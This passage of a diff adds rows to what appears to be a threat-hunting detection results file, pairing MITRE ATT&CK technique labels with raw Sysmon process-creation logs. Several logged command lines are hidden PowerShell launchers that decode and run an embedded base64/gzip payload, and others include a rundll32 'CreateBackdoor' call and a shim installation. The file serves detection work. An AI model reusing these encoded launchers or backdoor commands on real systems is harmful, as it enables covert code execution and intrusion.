uwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1594332367.487274,2020-07-10T02:06:07.487274+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-07-09T22:05:58.373961Z"">
+    </TimeCreated>
+    <EventRecordID>311382</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3148"" ThreadID=""4088"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-07-09 22:05:55.880</Data>
+    <Data Name=""ProcessGuid"">747F3D96-94C3-5F07-0000-001080B40100</Data>
+    <Data Name=""ProcessId"">3096</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-1350-5F08-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""ParentProcessId"">628</Data>
+    <Data Name=""ParentImage"">?</Data>
+    <Data Name=""ParentCommandLine"">?</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1115] Clipboard Data Collection,1594376435.589722,2020-07-10T14:20:35.589722+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rdpclip.exe ) through command line ( rdpclip ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-07-10T10:20:34.910334Z"">
+    </TimeCreated>
+    <EventRecordID>311396</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3148"" ThreadID=""4088"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-07-10 10:20:34.877</Data>
+    <Data Name=""ProcessGuid"">747F3D96-40F2-5F08-0000-0010D8A92C00</Data>
+    <Data Name=""ProcessId"">3304</Data>
+    <Data Name=""Image"">C:\Windows\System32\rdpclip.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1131 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">RDP Clipboard Monitor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">rdpclip.exe</Data>
+    <Data Name=""CommandLine"">rdpclip</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-94CD-5F07-0000-0020ABBF0300</Data>
+    <Data Name=""LogonId"">0x3bfab</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=0265C1718EC95B025D9719F3B4872826F8F4661F,MD5=9E089ECF8B86983B7A77E3844CD02BB5,SHA256=AF5CAE4B514215E530643A7FEA2D7A47A1B15F6E5610347B217D1ABFA4AE0F92,IMPHASH=E3F33CEBF67721DAC951AFBD20321206</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-1350-5F08-0000-001014C50000</Data>
+    <Data Name=""ParentProcessId"">824</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\System32\svchost.exe -k NetworkService -s TermService</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.459240Z"">
+    </TimeCreated>
+    <EventRecordID>243558</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.452</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001035972000</Data>
+    <Data Name=""ProcessId"">1388</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1138] Application Shimming - process,1553028568.168278,2019-03-20T00:49:28.168278+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T20:49:28.158264Z"">
+    </TimeCreated>
+    <EventRecordID>1966403</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1564"" ThreadID=""1252"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-19 20:49:28.058</Data>
+    <Data Name=""ProcessGuid"">365ABB72-55D8-5C91-0000-001060C90700</Data>
+    <Data Name=""ProcessId"">3648</Data>
+    <Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
+    <Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Compatibility Database Installer</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q -u &quot;C:\Windows\AppPatch\Test.SDB  &quot;  </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
+    <Data Name=""User"">EXAMPLE\user01</Data>
+    <Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
+    <Data Name=""LogonId"">0x33435</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
+    <Data Name=""ParentProcessId"">2704</Data>
+    <Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1556656012.371714,2019-05-01T00:26:52.371714+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;powershell.exe&quot; -noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T20:26:52.356089Z"">
+    </TimeCreated>
+    <EventRecordID>9809</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1964"" ThreadID=""1664"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 20:26:52.356</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AF8C-5CC8-0000-001003361900</Data>
+    <Data Name=""ProcessId"">2484</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;powershell.exe&quot; -noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-2586-5CC9-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-AF8B-5CC8-0000-0010AC1B1900</Data>
+    <Data Name=""ParentProcessId"">3872</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell.exe  -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436038.683059,2019-07-30T01:33:58.683059+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:58.598592Z"">
+    </TimeCreated>
+    <EventRecordID>4949</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:58.357</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6646-5D3F-0000-0010A7398B00</Data>
+    <Data Name=""ProcessId"">3868</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
